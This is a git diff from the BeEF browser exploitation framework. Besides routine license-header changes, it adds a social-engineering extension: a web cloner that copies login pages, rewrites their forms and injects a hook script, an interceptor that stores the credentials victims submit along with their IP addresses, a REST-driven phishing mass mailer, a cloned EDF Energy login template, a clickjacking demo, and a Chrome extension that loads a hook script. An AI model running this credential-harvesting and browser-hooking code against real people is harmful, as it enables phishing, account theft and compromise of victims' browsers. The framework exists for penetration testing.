a/extensions/demos/api.rb +++ b/extensions/demos/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/demos/chrome_extension/index.html b/extensions/demos/chrome_extension/index.html index 1edb829c0..702914d70 100644 --- a/extensions/demos/chrome_extension/index.html +++ b/extensions/demos/chrome_extension/index.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/chrome_extension/persistent_tab.html b/extensions/demos/chrome_extension/persistent_tab.html index 836354aae..65a992234 100644 --- a/extensions/demos/chrome_extension/persistent_tab.html +++ b/extensions/demos/chrome_extension/persistent_tab.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/config.yaml b/extensions/demos/config.yaml index 2cdbc00c7..d74ae8563 100644 --- a/extensions/demos/config.yaml +++ b/extensions/demos/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/demos/extension.rb b/extensions/demos/extension.rb index 635cea52d..c6684cf37 100644 --- a/extensions/demos/extension.rb +++ b/extensions/demos/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js index e20376b0e..808322d68 100644 --- a/extensions/demos/flash_update_chrome_extension/background.js +++ b/extensions/demos/flash_update_chrome_extension/background.js @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + d=document; e=d.createElement('script'); e.src="http://127.0.0.1:3000/hook.js"; diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html index f058afc95..c1920bed3 100644 --- a/extensions/demos/html/basic.html +++ b/extensions/demos/html/basic.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/html/butcher/butch.css b/extensions/demos/html/butcher/butch.css index c5e6b59b4..efb2f7610 100644 --- a/extensions/demos/html/butcher/butch.css +++ b/extensions/demos/html/butcher/butch.css @@ -1,18 +1,9 @@ /* - * Copyright 2012 Wade Alcorn wade@bindshell.net - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission */ + html { height: 100%; } diff --git a/extensions/demos/html/butcher/index.html b/extensions/demos/html/butcher/index.html index abede7df6..5c7b8264b 100644 --- a/extensions/demos/html/butcher/index.html +++ b/extensions/demos/html/butcher/index.html @@ -1,3 +1,8 @@ + diff --git a/extensions/demos/html/butcher/jquery-1.5.min.js b/extensions/demos/html/butcher/jquery-1.5.min.js index fe9eef546..86b5f7755 100644 --- a/extensions/demos/html/butcher/jquery-1.5.min.js +++ b/extensions/demos/html/butcher/jquery-1.5.min.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * jQuery JavaScript Library v1.5 * http://jquery.com/ diff --git a/extensions/demos/html/butcher/secret_page.html b/extensions/demos/html/butcher/secret_page.html index cf295841d..328d1d06f 100644 --- a/extensions/demos/html/butcher/secret_page.html +++ b/extensions/demos/html/butcher/secret_page.html @@ -1,3 +1,8 @@ + Secret Page diff --git a/extensions/demos/html/checkJava.java b/extensions/demos/html/checkJava.java index c618ce069..a936e5733 100755 --- a/extensions/demos/html/checkJava.java +++ b/extensions/demos/html/checkJava.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/extensions/demos/html/clickjack.html b/extensions/demos/html/clickjack.html deleted file mode 100644 index 486fe35b0..000000000 --- a/extensions/demos/html/clickjack.html +++ /dev/null @@ -1,4 +0,0 @@ -

 

-moooooooo -

 

- diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html new file mode 100644 index 000000000..a526b7c6c --- /dev/null +++ b/extensions/demos/html/clickjacking/clickjack_attack.html @@ -0,0 +1,182 @@ + + + + + + + You have been p0wned + + + + + + + + + + +
+
+
+

Name That Quote

+
You are a sad strange little man, and you have my pity.
+
+ Who said it? + Buzz Lightyear, Toy Story +
+ Another Quote +
+
+
+ + +
+
+

Click-thru

+

You must click here to get to the page.

+ Okay + No Thanks +
+
+ + + + + diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html new file mode 100644 index 000000000..5024b0f15 --- /dev/null +++ b/extensions/demos/html/clickjacking/clickjack_victim.html @@ -0,0 +1,19 @@ + + + + + + + + + +

 

+moooooooo +

 

+moooooooo + + diff --git a/extensions/demos/html/passwd_manager_theft.html b/extensions/demos/html/passwd_manager_theft.html deleted file mode 100644 index 4a2d70c50..000000000 --- a/extensions/demos/html/passwd_manager_theft.html +++ /dev/null @@ -1,27 +0,0 @@ - - - BeEF Password Manager Theft Demo - - - -

Password Manager Theft Demo

- -

- Instructions:
-
- 1. Write a fake username and password in the form below
- 2. After having submitted the form, make sure you tell firefox that you want to save
- 3. Exploit your hooked browser with the password manager theft command module. -

- -

-

- Username:

- Password:
- -
-

- - - - \ No newline at end of file diff --git a/extensions/demos/html/plain.html b/extensions/demos/html/plain.html index ff8ec25c3..1a37a3820 100644 --- a/extensions/demos/html/plain.html +++ b/extensions/demos/html/plain.html @@ -1,3 +1,8 @@ + + + + + +MyAccount + + + + + + + + + + + + + + + + +
+ + +
+
+ + + + + + +
+ + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + MyAccount + + + + + + + + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + +
+
+ + +
    +

    +
    + +
    +
+ +
+
+ +
+
+ + + + + + +
+

+ main content +

+
+ +
+ +
+
+
+

Login to MyAccount

+ + + +
+ + + + + + + + + +
+ + + + + + + + + + + + + + +
+ + + + helpPlease enter your username +
+ + + + helpPlease enter the password for this account +
+ + + + + +


+

Forgotten your username or password?

+
+ + +
+
+

Register Today!

+

 

+ +
    +
  • View and pay your bills
    • +
  • Submit your meter reading
    • +
  • Update your details
    • +
  • Sign up for Direct Debit
    • +

+ + + + + +
+ + +    +
+
+

Don't have an online account?
You can still submit a meter reading

+
+
+
+
+
+
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+ + + + +
+ + + \ No newline at end of file diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png new file mode 100644 index 000000000..2734ec427 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png new file mode 100644 index 000000000..51ca21042 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png differ diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png new file mode 100644 index 000000000..a4f175112 Binary files /dev/null and b/extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png differ diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb new file mode 100644 index 000000000..08599e5e4 --- /dev/null +++ b/extensions/social_engineering/models/interceptor.rb @@ -0,0 +1,25 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Interceptor + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_interceptor' + + property :id, Serial + property :ip, Text, :lazy => false + property :post_data, Text, :lazy => false + + belongs_to :webcloner + + end + + end + end +end diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb new file mode 100644 index 000000000..64faa59aa --- /dev/null +++ b/extensions/social_engineering/models/mass_mailer.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + + class Massmailer + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_massmailer' + + property :id, Serial + + #todo fields + end + + end + end +end diff --git a/extensions/social_engineering/models/web_cloner.rb b/extensions/social_engineering/models/web_cloner.rb new file mode 100644 index 000000000..0e18315cb --- /dev/null +++ b/extensions/social_engineering/models/web_cloner.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Core + module Models + class Webcloner + + include DataMapper::Resource + + storage_names[:default] = 'extension_seng_webcloner' + + property :id, Serial + + property :uri, Text, :lazy => false + property :mount, Text, :lazy => false + + has n, :extension_seng_interceptor, 'Interceptor' + + end + + end + end +end diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb new file mode 100644 index 000000000..332eebf6c --- /dev/null +++ b/extensions/social_engineering/rest/socialengineering.rb @@ -0,0 +1,121 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +module BeEF + module Extension + module SocialEngineering + class SEngRest < BeEF::Core::Router::Router + + config = BeEF::Core::Configuration.instance + + before do + error 401 unless params[:token] == config.get('beef.api_token') + halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip) + headers 'Content-Type' => 'application/json; charset=UTF-8', + 'Pragma' => 'no-cache', + 'Cache-Control' => 'no-cache', + 'Expires' => '0' + end + + #Example: curl -H "Content-Type: application/json; charset=UTF-8" + #-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue= + #https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2", "mount":"/url"}' + #-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7 + post '/clone_page' do + request.body.rewind + begin + body = JSON.parse request.body.read + uri = body["url"] + mount = body["mount"] + use_existing = body["use_existing"] + + if uri != nil && mount != nil + if (uri =~ URI::regexp).nil? #invalid URI + print_error "Invalid URI" + halt 401 + end + + if !mount[/^\//] # mount needs to start with / + print_error "Invalid mount (need to be a relative path, and start with / )" + halt 401 + end + + web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance + success = web_cloner.clone_page(uri,mount,use_existing) + if success + result = { + "success" => true, + "mount" => mount + }.to_json + else + result = { + "success" => false + }.to_json + end + end + + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" + error 400 # Bad Request + end + end + + # Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body' + #-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7 + # Example json_body: + #{ + # "template": "default", + # "subject": "Hi from BeEF", + # "fromname": "BeEF", + # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx", + # "linktext": "http://beefproject.com", + # "recipients": [{ + # "user1@gmail.com": "Michele", + # "user2@antisnatchor.com": "Antisnatchor" + #}] + #} + post '/send_mails' do + request.body.rewind + begin + body = JSON.parse request.body.read + + template = body["template"] + subject = body["subject"] + fromname = body["fromname"] + link = body["link"] + linktext = body["linktext"] + + if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil? + print_error "All parameters are mandatory." + halt 401 + end + + if (link =~ URI::regexp).nil?#invalid URI + print_error "Invalid link or linktext" + halt 401 + end + + recipients = body["recipients"][0] + + recipients.each do |email,name| + if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil? + print_error "Email [#{email}] or name [#{name}] are not valid/null." + halt 401 + end + end + + mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance + mass_mailer.send_email(template, fromname, subject, link, linktext, recipients) + rescue Exception => e + print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" + error 400 + end + end + + end + end + end +end \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/cloned_pages/readme.txt b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt new file mode 100644 index 000000000..ba99c53af --- /dev/null +++ b/extensions/social_engineering/web_cloner/cloned_pages/readme.txt @@ -0,0 +1,12 @@ +This is the directory where the cloned pages will be placed. +If you clone beefproject.com, there will be 2 files: + - beefproject.com <- original, unmodified + - beefproject.com_mod <- modified one + +In case you want to further modify the beefproject.com_mod manually, +and serve it through BeEF, do the following: + - clone the page + - modify the beefproject.com_mod file + - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call. + +In this way the x_mod page will be served, with your custom modifications. \ No newline at end of file diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb new file mode 100644 index 000000000..758bd3872 --- /dev/null +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -0,0 +1,51 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + require 'sinatra/base' + class Interceptor < Sinatra::Base + + configure do + set :show_exceptions, false + end + + # intercept GET + get "/" do + print_info "GET request from IP #{request.ip}" + print_info "Referer: #{request.referer}" + cloned_page = settings.cloned_page + cloned_page + end + + # intercept POST + post "/" do + print_info "POST request from IP #{request.ip}" + request.body.rewind + data = request.body.read + print_info "Intercepted data:" + print_info data + + interceptor_db = BeEF::Core::Models::Interceptor.new( + :webcloner_id => settings.db_entry.id, + :post_data => data, + :ip => request.ip + ) + interceptor_db.save + + if settings.frameable + print_info "Page can be framed :-) Loading original URL into iFrame..." + "\n" + else + print_info "Page can not be framed :-) Redirecting to original URL..." + redirect settings.redirect_to + end + end + end + end + end +end + diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb new file mode 100644 index 000000000..81854644e --- /dev/null +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -0,0 +1,186 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +module BeEF + module Extension + module SocialEngineering + class WebCloner + include Singleton + + + def initialize + @http_server = BeEF::Core::Server.instance + @config = BeEF::Core::Configuration.instance + @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/" + @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}" + end + + def clone_page(url, mount, use_existing) + print_info "Cloning page at URL #{url}" + uri = URI(url) + output = uri.host + output_mod = "#{output}_mod" + user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') + + success = false + + # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser, + # there is no need to implement the complex logic to handle all different cases. + # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification. + # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following: + # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file + # - the user modify the example.com_mod file manually + # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file + # + if use_existing.nil? || use_existing == false + begin #,"--background" + IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end + success = true + rescue Exception => e + print_error "Errors executing wget: #{e}" + print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH." + end + + if success + File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| + File.open("#{@cloned_pages_dir + output}", 'r').each do |line| + # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") || line.include?("")) && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "BeEF hook added :-D" + else + out_file.print line + end + end + end + end + end + + if File.size("#{@cloned_pages_dir + output}") > 0 + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + + # if the user wants to clone http://a.com/login.jsp?cas=true&ciccio=false , split the URL mounting only the path. + # then the phishing link can be used anyway with all the proper parameters to looks legit. + if mount.include?("?") + mount = mount.split("?").first + print_info "Normalizing mount point. You can still use params for the phishing link." + end + + # Check if the original URL can be framed + frameable = is_frameable(url) + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + interceptor.set :cloned_page, get_page_content(file_path) + interceptor.set :db_entry, persist_page(url,mount) + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" + @http_server.remap + success = true + else + print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." + success = false + end + + success + end + + private + # Replace with + def add_beef_hook(line) + if line.include?("") + line.gsub!("","\n") + elsif + line.gsub!("","\n") + end + line + end + + private + # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm + def is_frameable(url) + result = true + begin + uri = URI(url) + http = Net::HTTP.new(uri.host, uri.port) + if uri.scheme == "https" + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE + end + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + frame_opt = response["X-Frame-Options"] + + if frame_opt != nil + if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0 + result = false + end + end + print_info "Page can be framed: [#{result}]" + rescue Exception => e + result = false + print_error "Unable to determine if page can be framed. Page can be framed: [#{result}]" + print_debug e + #print_debug e.backtrace + end + result + end + + def get_page_content(file_path) + file = File.open(file_path,'r') + cloned_page = file.read + file.close + cloned_page + end + + def persist_page(uri, mount) + webcloner_db = BeEF::Core::Models::Webcloner.new( + :uri => uri, + :mount => mount + ) + webcloner_db.save + webcloner_db + end + + end + end + end +end + diff --git a/extensions/xssrays/api.rb b/extensions/xssrays/api.rb index ee98ed8e0..2eff2b316 100644 --- a/extensions/xssrays/api.rb +++ b/extensions/xssrays/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb index ce5d31548..ceb0b3374 100644 --- a/extensions/xssrays/api/scan.rb +++ b/extensions/xssrays/api/scan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension @@ -53,19 +43,9 @@ module BeEF # todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. + // Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + // Browser Exploitation Framework (BeEF) - http://beefproject.com + // See the file \'doc/COPYING\' for copying permission //', "") add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug ws.send(content + @body,hb.session) diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml index 84d136b5a..20b710e62 100644 --- a/extensions/xssrays/config.yaml +++ b/extensions/xssrays/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: extension: diff --git a/extensions/admin_ui/controllers/xssrays/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb similarity index 87% rename from extensions/admin_ui/controllers/xssrays/xssrays.rb rename to extensions/xssrays/controllers/xssrays.rb index c951f62e5..d8ea2f3fe 100644 --- a/extensions/admin_ui/controllers/xssrays/xssrays.rb +++ b/extensions/xssrays/controllers/xssrays.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb index 4c024aed9..1f2f75e40 100644 --- a/extensions/xssrays/extension.rb +++ b/extensions/xssrays/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb index 500e7965e..abc6eaea4 100644 --- a/extensions/xssrays/handler.rb +++ b/extensions/xssrays/handler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb index 8201e7b91..09993368b 100644 --- a/extensions/xssrays/models/xssraysdetail.rb +++ b/extensions/xssrays/models/xssraysdetail.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb index 544cb251b..e055d1f29 100644 --- a/extensions/xssrays/models/xssraysscan.rb +++ b/extensions/xssrays/models/xssraysscan.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/install b/install index 62bf0534e..a8e0cbe17 100755 --- a/install +++ b/install @@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# 